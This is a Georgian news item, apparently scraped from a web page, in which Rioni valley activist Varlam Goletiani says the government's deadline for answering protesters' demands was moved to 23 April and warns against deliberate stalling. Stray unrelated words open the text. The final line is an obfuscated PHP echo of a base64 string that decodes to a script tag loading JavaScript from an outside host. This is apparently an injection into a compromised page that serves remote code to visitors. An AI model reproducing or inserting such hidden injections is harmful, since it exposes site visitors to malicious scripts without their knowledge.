celsiusi
ავერსი შნაიდერი
რიონის ხეობის მცველი, ვარლამ გოლეთიანი აცხადებს, რომ მათი პირობების დაკმაყოფილება/არდაკმაყოფილების საკითხზე პასუხების ვადამ პარასკევამდე, 23 აპრილამდე გადაიწია. გოლეთიანმა მედიას უთხრა, რომ ამის შესახებ პრემიერის წარმომადგენელებს ესაუბრა. მათგან კი მიზეზად მოისმინა, რომ პრემიერი კორონავირუსით იყო ინფიცირებული, გუშინ კი ევროპული საბჭოს პრეზიდენტთან ჰქონდა შეხვედრები და ვერ გააცნეს დეტალები.
 
"დრო არ მუშაობს მათ სასარგებლოდ და პირიქით, განწყობები იქმნება საზოგადოებაში ისეთი, რომ ხელოვნურად ხდება ამ პროცესის [გაჭიანურება] და თუკი კოვიდის ფაქტორსაც გამოიყენებენ იმისთვის, რომ ჩვენ სრულყოფილად ვეღარ შევძლოთ ფარტომასშტაბიანი აქციების გამართავ, ეს გააჩენს განცდას, რომ ხელისუფლებას კი არ უნდა, რომ მოაგვაროს, არამედ ის აპირებს "საზოგადოების" მოტყუებას გაძრომ-გამოძრომით", - განაცხადა გოლეთიანმა.
 
მანვე აღნიშნა, რომ თუ ხელისუფლება ვადებს გაწელავს, "ცუდად მოუბრუნდებათ":
 
"ეს დრო, რომელიც გადის და გონივრული ვადა, რომელიც ამოიწურა, არ მუშაობს მათთვის. მათ გავაცანი ჩვენი პოზიცია, რომ თუკი ამას დაემატება კოვიდიდან გამომდინარე შეზღუდვები და აიკრძალება საქალაქთაშორისო გადაადგილება - ადამიანებს საშუალება აღარ ექნებათ, რომ ჩვენამდე მოვიდნენ ან თავისუფლად დავგეგმოთ პროტესტი, ეს გააჩენს განცდას, რომ ხელისუფლებამ გაწელა დრო შეგნებულად და შემდეგ ჩაკეტა კოვიდის ფაქტორით".
1491
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");